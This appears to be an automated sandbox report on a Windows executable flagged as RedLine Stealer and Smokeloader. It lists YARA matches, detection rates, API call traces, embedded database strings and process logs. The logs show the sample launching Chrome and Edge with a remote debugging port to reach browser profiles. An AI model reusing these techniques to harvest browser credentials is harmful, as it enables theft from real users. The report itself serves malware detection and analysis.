Source: unknown	HTTPS traffic detected: 4.245.163.56:443 -> 192.168.2.7:49793 version: TLS 1.2

Source: C:\Users\user\Desktop\HrxOpVxK5d.exe

Code function: 0_2_00409E30 memset,wsprintfA,OpenDesktopA,CreateDesktopA,memset,lstrcatA,lstrcatA,lstrcatA,memset,lstrcpy,memset,CreateProcessA,Sleep,CloseDesktop,

0_2_00409E30

System Summary

Malicious sample detected (through community Yara rule)

Source: 00000000.00000002.1775076444.0000000002CC2000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000000.00000002.1775489473.0000000004900000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown

Source: C:\Users\user\Desktop\HrxOpVxK5d.exe	Code function: 0_2_6CEAB700 NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error,	0_2_6CEAB700
Source: C:\Users\user\Desktop\HrxOpVxK5d.exe	Code function: 0_2_6CEAB8C0 rand_s,NtQueryVirtualMemory,	0_2_6CEAB8C0
Source: C:\Users\user\Desktop\HrxOpVxK5d.exe	Code function: 0_2_6CEAB910 rand_s,NtQueryVirtualMemory,NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error,GetLastError,	0_2_6CEAB910
Source: C:\Users\user\Desktop\HrxOpVxK5d.exe	Code function: 0_2_6CE4F280 NtQueryVirtualMemory,GetProcAddress,NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error,	0_2_6CE4F280

Source: C:\Users\user\Desktop\HrxOpVxK5d.exe	Code function: 0_2_6CE435A0	0_2_6CE435A0
Source: C:\Users\user\Desktop\HrxOpVxK5d.exe	Code function: 0_2_6CE4D4E0	0_2_6CE4D4E0
Source: C:\Users\user\Desktop\HrxOpVxK5d.exe	Code function: 0_2_6CE86CF0	0_2_6CE86CF0
Source: C:\Users\user\Desktop\HrxOpVxK5d.exe	Code function: 0_2_6CE564C0	0_2_6CE564C0
Source: C:\Users\user\Desktop\HrxOpVxK5d.exe	Code function: 0_2_6CE6D4D0	0_2_6CE6D4D0
Source: C:\Users\user\Desktop\HrxOpVxK5d.exe	Code function: 0_2_6CEA34A0	0_2_6CEA34A0
Source: C:\Users\user\Desktop\HrxOpVxK5d.exe	Code function: 0_2_6CEAC4A0	0_2_6CEAC4A0
Source: C:\Users\user\Desktop\HrxOpVxK5d.exe	Code function: 0_2_6CE56C80	0_2_6CE56C80
Source: C:\Users\user\Desktop\HrxOpVxK5d.exe	Code function: 0_2_6CE55440	0_2_6CE55440
Source: C:\Users\user\Desktop\HrxOpVxK5d.exe	Code function: 0_2_6CEB545C	0_2_6CEB545C
Source: C:\Users\user\Desktop\HrxOpVxK5d.exe	Code function: 0_2_6CEB542B	0_2_6CEB542B
Source: C:\Users\user\Desktop\HrxOpVxK5d.exe	Code function: 0_2_6CEBAC00	0_2_6CEBAC00
Source: C:\Users\user\Desktop\HrxOpVxK5d.exe	Code function: 0_2_6CE85C10	0_2_6CE85C10
Source: C:\Users\user\Desktop\HrxOpVxK5d.exe	Code function: 0_2_6CE92C10	0_2_6CE92C10
Source: C:\Users\user\Desktop\HrxOpVxK5d.exe	Code function: 0_2_6CEA85F0	0_2_6CEA85F0
Source: C:\Users\user\Desktop\HrxOpVxK5d.exe	Code function: 0_2_6CE80DD0	0_2_6CE80DD0
Source: C:\Users\user\Desktop\HrxOpVxK5d.exe	Code function: 0_2_6CE5FD00	0_2_6CE5FD00
Source: C:\Users\user\Desktop\HrxOpVxK5d.exe	Code function: 0_2_6CE70512	0_2_6CE70512
Source: C:\Users\user\Desktop\HrxOpVxK5d.exe	Code function: 0_2_6CE6ED10	0_2_6CE6ED10
Source: C:\Users\user\Desktop\HrxOpVxK5d.exe	Code function: 0_2_6CEB76E3	0_2_6CEB76E3
Source: C:\Users\user\Desktop\HrxOpVxK5d.exe	Code function: 0_2_6CE4BEF0	0_2_6CE4BEF0
Source: C:\Users\user\Desktop\HrxOpVxK5d.exe	Code function: 0_2_6CE5FEF0	0_2_6CE5FEF0
Source: C:\Users\user\Desktop\HrxOpVxK5d.exe	Code function: 0_2_6CEA4EA0	0_2_6CEA4EA0
Source: C:\Users\user\Desktop\HrxOpVxK5d.exe	Code function: 0_2_6CEAE680	0_2_6CEAE680
Source: C:\Users\user\Desktop\HrxOpVxK5d.exe	Code function: 0_2_6CE65E90	0_2_6CE65E90
Source: C:\Users\user\Desktop\HrxOpVxK5d.exe	Code function: 0_2_6CEB6E63	0_2_6CEB6E63
Source: C:\Users\user\Desktop\HrxOpVxK5d.exe	Code function: 0_2_6CE4C670	0_2_6CE4C670
Source: C:\Users\user\Desktop\HrxOpVxK5d.exe	Code function: 0_2_6CE64640	0_2_6CE64640
Source: C:\Users\user\Desktop\HrxOpVxK5d.exe	Code function: 0_2_6CE92E4E	0_2_6CE92E4E
Source: C:\Users\user\Desktop\HrxOpVxK5d.exe	Code function: 0_2_6CE69E50	0_2_6CE69E50
Source: C:\Users\user\Desktop\HrxOpVxK5d.exe	Code function: 0_2_6CE83E50	0_2_6CE83E50
Source: C:\Users\user\Desktop\HrxOpVxK5d.exe	Code function: 0_2_6CEA9E30	0_2_6CEA9E30
Source: C:\Users\user\Desktop\HrxOpVxK5d.exe	Code function: 0_2_6CE95600	0_2_6CE95600
Source: C:\Users\user\Desktop\HrxOpVxK5d.exe	Code function: 0_2_6CE87E10	0_2_6CE87E10
Source: C:\Users\user\Desktop\HrxOpVxK5d.exe	Code function: 0_2_6CE4DFE0	0_2_6CE4DFE0
Source: C:\Users\user\Desktop\HrxOpVxK5d.exe	Code function: 0_2_6CE76FF0	0_2_6CE76FF0
Source: C:\Users\user\Desktop\HrxOpVxK5d.exe	Code function: 0_2_6CE977A0	0_2_6CE977A0
Source: C:\Users\user\Desktop\HrxOpVxK5d.exe	Code function: 0_2_6CE59F00	0_2_6CE59F00
Source: C:\Users\user\Desktop\HrxOpVxK5d.exe	Code function: 0_2_6CE87710	0_2_6CE87710
Source: C:\Users\user\Desktop\HrxOpVxK5d.exe	Code function: 0_2_6CE6C0E0	0_2_6CE6C0E0
Source: C:\Users\user\Desktop\HrxOpVxK5d.exe	Code function: 0_2_6CE858E0	0_2_6CE858E0
Source: C:\Users\user\Desktop\HrxOpVxK5d.exe	Code function: 0_2_6CEB50C7	0_2_6CEB50C7
Source: C:\Users\user\Desktop\HrxOpVxK5d.exe	Code function: 0_2_6CE760A0	0_2_6CE760A0
Source: C:\Users\user\Desktop\HrxOpVxK5d.exe	Code function: 0_2_6CE8F070	0_2_6CE8F070
Source: C:\Users\user\Desktop\HrxOpVxK5d.exe	Code function: 0_2_6CE68850	0_2_6CE68850
Source: C:\Users\user\Desktop\HrxOpVxK5d.exe	Code function: 0_2_6CE6D850	0_2_6CE6D850
Source: C:\Users\user\Desktop\HrxOpVxK5d.exe	Code function: 0_2_6CE8B820	0_2_6CE8B820
Source: C:\Users\user\Desktop\HrxOpVxK5d.exe	Code function: 0_2_6CE94820	0_2_6CE94820
Source: C:\Users\user\Desktop\HrxOpVxK5d.exe	Code function: 0_2_6CE57810	0_2_6CE57810
Source: C:\Users\user\Desktop\HrxOpVxK5d.exe	Code function: 0_2_6CE4C9A0	0_2_6CE4C9A0
Source: C:\Users\user\Desktop\HrxOpVxK5d.exe	Code function: 0_2_6CE7D9B0	0_2_6CE7D9B0
Source: C:\Users\user\Desktop\HrxOpVxK5d.exe	Code function: 0_2_6CE85190	0_2_6CE85190
Source: C:\Users\user\Desktop\HrxOpVxK5d.exe	Code function: 0_2_6CEA2990	0_2_6CEA2990
Source: C:\Users\user\Desktop\HrxOpVxK5d.exe	Code function: 0_2_6CE5D960	0_2_6CE5D960
Source: C:\Users\user\Desktop\HrxOpVxK5d.exe	Code function: 0_2_6CE9B970	0_2_6CE9B970
Source: C:\Users\user\Desktop\HrxOpVxK5d.exe	Code function: 0_2_6CEBB170	0_2_6CEBB170
Source: C:\Users\user\Desktop\HrxOpVxK5d.exe	Code function: 0_2_6CE6A940	0_2_6CE6A940
Source: C:\Users\user\Desktop\HrxOpVxK5d.exe	Code function: 0_2_6CE61AF0	0_2_6CE61AF0
Source: C:\Users\user\Desktop\HrxOpVxK5d.exe	Code function: 0_2_6CE8E2F0	0_2_6CE8E2F0
Source: C:\Users\user\Desktop\HrxOpVxK5d.exe	Code function: 0_2_6CE88AC0	0_2_6CE88AC0
Source: C:\Users\user\Desktop\HrxOpVxK5d.exe	Code function: 0_2_6CE422A0	0_2_6CE422A0
Source: C:\Users\user\Desktop\HrxOpVxK5d.exe	Code function: 0_2_6CE74AA0	0_2_6CE74AA0
Source: C:\Users\user\Desktop\HrxOpVxK5d.exe	Code function: 0_2_6CE5CAB0	0_2_6CE5CAB0
Source: C:\Users\user\Desktop\HrxOpVxK5d.exe	Code function: 0_2_6CEB2AB0	0_2_6CEB2AB0
Source: C:\Users\user\Desktop\HrxOpVxK5d.exe	Code function: 0_2_6CEBBA90	0_2_6CEBBA90
Source: C:\Users\user\Desktop\HrxOpVxK5d.exe	Code function: 0_2_6CE89A60	0_2_6CE89A60
Source: C:\Users\user\Desktop\HrxOpVxK5d.exe	Code function: 0_2_6CEB53C8	0_2_6CEB53C8
Source: C:\Users\user\Desktop\HrxOpVxK5d.exe	Code function: 0_2_6CE4F380	0_2_6CE4F380
Source: C:\Users\user\Desktop\HrxOpVxK5d.exe	Code function: 0_2_6CE5C370	0_2_6CE5C370
Source: C:\Users\user\Desktop\HrxOpVxK5d.exe	Code function: 0_2_6CE45340	0_2_6CE45340
Source: C:\Users\user\Desktop\HrxOpVxK5d.exe	Code function: 0_2_6CE8D320	0_2_6CE8D320
Source: C:\Users\user\Desktop\HrxOpVxK5d.exe	Code function: 0_2_6CF6ECD0	0_2_6CF6ECD0
Source: C:\Users\user\Desktop\HrxOpVxK5d.exe	Code function: 0_2_6D098D20	0_2_6D098D20
Source: C:\Users\user\Desktop\HrxOpVxK5d.exe	Code function: 0_2_6CF0ECC0	0_2_6CF0ECC0
Source: C:\Users\user\Desktop\HrxOpVxK5d.exe	Code function: 0_2_6D03AD50	0_2_6D03AD50
Source: C:\Users\user\Desktop\HrxOpVxK5d.exe	Code function: 0_2_6CF1AC60	0_2_6CF1AC60
Source: C:\Users\user\Desktop\HrxOpVxK5d.exe	Code function: 0_2_6D09CDC0	0_2_6D09CDC0
Source: C:\Users\user\Desktop\HrxOpVxK5d.exe	Code function: 0_2_6CFEAC30	0_2_6CFEAC30
Source: C:\Users\user\Desktop\HrxOpVxK5d.exe	Code function: 0_2_6CFD6C00	0_2_6CFD6C00
Source: C:\Users\user\Desktop\HrxOpVxK5d.exe	Code function: 0_2_6CF14DB0	0_2_6CF14DB0
Source: C:\Users\user\Desktop\HrxOpVxK5d.exe	Code function: 0_2_6CFA6D90	0_2_6CFA6D90
Source: C:\Users\user\Desktop\HrxOpVxK5d.exe	Code function: 0_2_6CFDED70	0_2_6CFDED70
Source: C:\Users\user\Desktop\HrxOpVxK5d.exe	Code function: 0_2_6D050F20	0_2_6D050F20
Source: C:\Users\user\Desktop\HrxOpVxK5d.exe	Code function: 0_2_6CF1AEC0	0_2_6CF1AEC0
Source: C:\Users\user\Desktop\HrxOpVxK5d.exe	Code function: 0_2_6CFB0EC0	0_2_6CFB0EC0
Source: C:\Users\user\Desktop\HrxOpVxK5d.exe	Code function: 0_2_6CF96E90	0_2_6CF96E90
Source: C:\Users\user\Desktop\HrxOpVxK5d.exe	Code function: 0_2_6CFAEE70	0_2_6CFAEE70
Source: C:\Users\user\Desktop\HrxOpVxK5d.exe	Code function: 0_2_6D058FB0	0_2_6D058FB0
Source: C:\Users\user\Desktop\HrxOpVxK5d.exe	Code function: 0_2_6CFF0E20	0_2_6CFF0E20
Source: C:\Users\user\Desktop\HrxOpVxK5d.exe	Code function: 0_2_6CFEEFF0	0_2_6CFEEFF0
Source: C:\Users\user\Desktop\HrxOpVxK5d.exe	Code function: 0_2_6CF10FE0	0_2_6CF10FE0
Source: C:\Users\user\Desktop\HrxOpVxK5d.exe	Code function: 0_2_6CF1EFB0	0_2_6CF1EFB0
Source: C:\Users\user\Desktop\HrxOpVxK5d.exe	Code function: 0_2_6CFD2F70	0_2_6CFD2F70
Source: C:\Users\user\Desktop\HrxOpVxK5d.exe	Code function: 0_2_6CF7EF40	0_2_6CF7EF40
Source: C:\Users\user\Desktop\HrxOpVxK5d.exe	Code function: 0_2_6CF16F10	0_2_6CF16F10
Source: C:\Users\user\Desktop\HrxOpVxK5d.exe	Code function: 0_2_6CFE4840	0_2_6CFE4840
Source: C:\Users\user\Desktop\HrxOpVxK5d.exe	Code function: 0_2_6CF60820	0_2_6CF60820
Source: C:\Users\user\Desktop\HrxOpVxK5d.exe	Code function: 0_2_6CF9A820	0_2_6CF9A820
Source: C:\Users\user\Desktop\HrxOpVxK5d.exe	Code function: 0_2_6D02C9E0	0_2_6D02C9E0
Source: C:\Users\user\Desktop\HrxOpVxK5d.exe	Code function: 0_2_6CF449F0	0_2_6CF449F0
Source: C:\Users\user\Desktop\HrxOpVxK5d.exe	Code function: 0_2_6CFD09B0	0_2_6CFD09B0
Source: C:\Users\user\Desktop\HrxOpVxK5d.exe	Code function: 0_2_6CFA09A0	0_2_6CFA09A0
Source: C:\Users\user\Desktop\HrxOpVxK5d.exe	Code function: 0_2_6CFCA9A0	0_2_6CFCA9A0
Source: C:\Users\user\Desktop\HrxOpVxK5d.exe	Code function: 0_2_6CF48960	0_2_6CF48960
Source: C:\Users\user\Desktop\HrxOpVxK5d.exe	Code function: 0_2_6D0168E0	0_2_6D0168E0
Source: C:\Users\user\Desktop\HrxOpVxK5d.exe	Code function: 0_2_6CF66900	0_2_6CF66900
Source: C:\Users\user\Desktop\HrxOpVxK5d.exe	Code function: 0_2_6CF8EA80	0_2_6CF8EA80
Source: C:\Users\user\Desktop\HrxOpVxK5d.exe	Code function: 0_2_6CF8CA70	0_2_6CF8CA70
Source: C:\Users\user\Desktop\HrxOpVxK5d.exe	Code function: 0_2_6CFC8A30	0_2_6CFC8A30
Source: C:\Users\user\Desktop\HrxOpVxK5d.exe	Code function: 0_2_6D016BE0	0_2_6D016BE0
Source: C:\Users\user\Desktop\HrxOpVxK5d.exe	Code function: 0_2_6CFBEA00	0_2_6CFBEA00
Source: C:\Users\user\Desktop\HrxOpVxK5d.exe	Code function: 0_2_6CFB0BA0	0_2_6CFB0BA0
Source: C:\Users\user\Desktop\HrxOpVxK5d.exe	Code function: 0_2_6CF564D0	0_2_6CF564D0
Source: C:\Users\user\Desktop\HrxOpVxK5d.exe	Code function: 0_2_6CFAA4D0	0_2_6CFAA4D0
Source: C:\Users\user\Desktop\HrxOpVxK5d.exe	Code function: 0_2_6D014540	0_2_6D014540
Source: C:\Users\user\Desktop\HrxOpVxK5d.exe	Code function: 0_2_6D058550	0_2_6D058550
Source: C:\Users\user\Desktop\HrxOpVxK5d.exe	Code function: 0_2_6CF28460	0_2_6CF28460
Source: C:\Users\user\Desktop\HrxOpVxK5d.exe	Code function: 0_2_6CF9A430	0_2_6CF9A430
Source: C:\Users\user\Desktop\HrxOpVxK5d.exe	Code function: 0_2_6CF74420	0_2_6CF74420
Source: C:\Users\user\Desktop\HrxOpVxK5d.exe	Code function: 0_2_6CF9E5F0	0_2_6CF9E5F0
Source: C:\Users\user\Desktop\HrxOpVxK5d.exe	Code function: 0_2_6CFDA5E0	0_2_6CFDA5E0
Source: C:\Users\user\Desktop\HrxOpVxK5d.exe	Code function: 0_2_6CF045B0	0_2_6CF045B0
Source: C:\Users\user\Desktop\HrxOpVxK5d.exe	Code function: 0_2_6D03A480	0_2_6D03A480
Source: C:\Users\user\Desktop\HrxOpVxK5d.exe	Code function: 0_2_6CFB0570	0_2_6CFB0570
Source: C:\Users\user\Desktop\HrxOpVxK5d.exe	Code function: 0_2_6CF72560	0_2_6CF72560
Source: C:\Users\user\Desktop\HrxOpVxK5d.exe	Code function: 0_2_6CF68540	0_2_6CF68540
Source: C:\Users\user\Desktop\HrxOpVxK5d.exe	Code function: 0_2_6CF6E6E0	0_2_6CF6E6E0
Source: C:\Users\user\Desktop\HrxOpVxK5d.exe	Code function: 0_2_6CFAE6E0	0_2_6CFAE6E0
Source: C:\Users\user\Desktop\HrxOpVxK5d.exe	Code function: 0_2_6CF346D0	0_2_6CF346D0

Source: C:\Users\user\Desktop\HrxOpVxK5d.exe	Code function: String function: 6CF33620 appears 35 times
Source: C:\Users\user\Desktop\HrxOpVxK5d.exe	Code function: String function: 00404610 appears 317 times
Source: C:\Users\user\Desktop\HrxOpVxK5d.exe	Code function: String function: 6CE894D0 appears 90 times
Source: C:\Users\user\Desktop\HrxOpVxK5d.exe	Code function: String function: 6D09DAE0 appears 34 times
Source: C:\Users\user\Desktop\HrxOpVxK5d.exe	Code function: String function: 6CF39B10 appears 32 times
Source: C:\Users\user\Desktop\HrxOpVxK5d.exe	Code function: String function: 6CE7CBE8 appears 134 times
Source: C:\Users\user\Desktop\HrxOpVxK5d.exe	Code function: String function: 6D0909D0 appears 140 times

Source: C:\Users\user\Desktop\HrxOpVxK5d.exe

Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6396 -s 2436

Source: HrxOpVxK5d.exe, 00000000.00000002.1799266994.000000006D0E5000.00000002.00000001.01000000.00000012.sdmp	Binary or memory string: OriginalFilenamenss3.dll0 vs HrxOpVxK5d.exe
Source: HrxOpVxK5d.exe, 00000000.00000002.1798873657.000000006CED2000.00000002.00000001.01000000.00000013.sdmp	Binary or memory string: OriginalFilenamemozglue.dll0 vs HrxOpVxK5d.exe

Source: HrxOpVxK5d.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: 00000000.00000002.1775076444.0000000002CC2000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000000.00000002.1775489473.0000000004900000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23

Source: HrxOpVxK5d.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@64/304@24/25

Source: C:\Users\user\Desktop\HrxOpVxK5d.exe

Code function: 0_2_6CEA7030 GetLastError,FormatMessageA,__acrt_iob_func,__acrt_iob_func,__acrt_iob_func,fflush,LocalFree,

0_2_6CEA7030

Source: C:\Users\user\Desktop\HrxOpVxK5d.exe

Code function: 0_2_00418810 CreateToolhelp32Snapshot,Process32First,Process32Next,CloseHandle,

0_2_00418810

Source: C:\Users\user\Desktop\HrxOpVxK5d.exe

Code function: 0_2_00413970 CoCreateInstance,MultiByteToWideChar,lstrcpyn,

0_2_00413970

Source: C:\Users\user\Desktop\HrxOpVxK5d.exe

File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\P8AI9WK0.htm

Jump to behavior

Source: C:\Windows\SysWOW64\WerFault.exe

Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess6396

Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

File created: C:\Users\user~1\AppData\Local\Temp\d48252db-e4bc-4ab0-9f63-cf692cb7ce1e.tmp

Jump to behavior

Source: HrxOpVxK5d.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\HrxOpVxK5d.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr	Binary or memory string: CREATE TABLE metaData (id PRIMARY KEY UNIQUE ON CONFLICT REPLACE, item1, item2);
Source: HrxOpVxK5d.exe, 00000000.00000002.1798402226.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, HrxOpVxK5d.exe, 00000000.00000002.1799137014.000000006D09F000.00000002.00000001.01000000.00000012.sdmp, HrxOpVxK5d.exe, 00000000.00000002.1787817969.000000001D36C000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr	Binary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' \|\| %Q \|\| substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr	Binary or memory string: SELECT ALL * FROM %s LIMIT 0;
Source: HrxOpVxK5d.exe, 00000000.00000002.1798402226.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, HrxOpVxK5d.exe, 00000000.00000002.1799137014.000000006D09F000.00000002.00000001.01000000.00000012.sdmp, HrxOpVxK5d.exe, 00000000.00000002.1787817969.000000001D36C000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr	Binary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
Source: HrxOpVxK5d.exe, 00000000.00000002.1798402226.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, HrxOpVxK5d.exe, 00000000.00000002.1799137014.000000006D09F000.00000002.00000001.01000000.00000012.sdmp, HrxOpVxK5d.exe, 00000000.00000002.1787817969.000000001D36C000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr	Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
Source: HrxOpVxK5d.exe, 00000000.00000002.1798402226.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, HrxOpVxK5d.exe, 00000000.00000002.1799137014.000000006D09F000.00000002.00000001.01000000.00000012.sdmp, HrxOpVxK5d.exe, 00000000.00000002.1787817969.000000001D36C000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr	Binary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr	Binary or memory string: UPDATE %s SET %s WHERE id=$ID;
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr	Binary or memory string: SELECT ALL * FROM metaData WHERE id=$ID;
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr	Binary or memory string: SELECT ALL id FROM %s WHERE %s;
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr	Binary or memory string: INSERT INTO metaData (id,item1) VALUES($ID,$ITEM1);
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr	Binary or memory string: INSERT INTO %s (id%s) VALUES($ID%s);
Source: HrxOpVxK5d.exe, HrxOpVxK5d.exe, 00000000.00000002.1798402226.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, HrxOpVxK5d.exe, 00000000.00000002.1799137014.000000006D09F000.00000002.00000001.01000000.00000012.sdmp, HrxOpVxK5d.exe, 00000000.00000002.1787817969.000000001D36C000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr	Binary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
Source: HrxOpVxK5d.exe, 00000000.00000002.1798402226.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, HrxOpVxK5d.exe, 00000000.00000002.1787817969.000000001D36C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE x(addr INT,opcode TEXT,p1 INT,p2 INT,p3 INT,p4 TEXT,p5 INT,comment TEXT,subprog TEXT,stmt HIDDEN);
Source: HrxOpVxK5d.exe, 00000000.00000002.1798402226.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, HrxOpVxK5d.exe, 00000000.00000002.1799137014.000000006D09F000.00000002.00000001.01000000.00000012.sdmp, HrxOpVxK5d.exe, 00000000.00000002.1787817969.000000001D36C000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr	Binary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr	Binary or memory string: INSERT INTO metaData (id,item1,item2) VALUES($ID,$ITEM1,$ITEM2);
Source: HrxOpVxK5d.exe, 00000000.00000003.1417629495.00000000232EB000.00000004.00000020.00020000.00000000.sdmp, HrxOpVxK5d.exe, 00000000.00000003.1513290030.00000000232DF000.00000004.00000020.00020000.00000000.sdmp, BAFIEGIECGCBKFIEBGCA.0.dr, FBGHIIJDGHCBFIECBKEG.0.dr	Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: HrxOpVxK5d.exe, 00000000.00000002.1798402226.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, HrxOpVxK5d.exe, 00000000.00000002.1787817969.000000001D36C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr	Binary or memory string: SELECT ALL * FROM %s LIMIT 0;CREATE TEMPORARY TABLE %s AS SELECT * FROM %sD
Source: HrxOpVxK5d.exe, 00000000.00000002.1798402226.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, HrxOpVxK5d.exe, 00000000.00000002.1787817969.000000001D36C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE x(type TEXT,schema TEXT,name TEXT,wr INT,subprog TEXT,stmt HIDDEN);
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr	Binary or memory string: SELECT DISTINCT %s FROM %s where id=$ID LIMIT 1;

Source: HrxOpVxK5d.exe	ReversingLabs: Detection: 52%
Source: HrxOpVxK5d.exe	Virustotal: Detection: 45%

Source: unknown	Process created: C:\Users\user\Desktop\HrxOpVxK5d.exe "C:\Users\user\Desktop\HrxOpVxK5d.exe"
Source: C:\Users\user\Desktop\HrxOpVxK5d.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe" --remote-debugging-port=9229 --profile-directory="Default"
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2640 --field-trial-handle=2340,i,8805815916245064741,14049672499791549619,262144 /prefetch:8
Source: C:\Users\user\Desktop\HrxOpVxK5d.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge.exe" --remote-debugging-port=9229 --profile-directory="Default"
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2848 --field-trial-handle=2556,i,10855429805949803760,7672887330153088567,262144 /prefetch:3
Source: unknown	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9229 --profile-directory=Default --flag-switches-begin --flag-switches-end --disable-nacl --do-not-de-elevate
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2276 --field-trial-handle=2092,i,15195154386885760925,7904617006657469936,262144 /prefetch:3
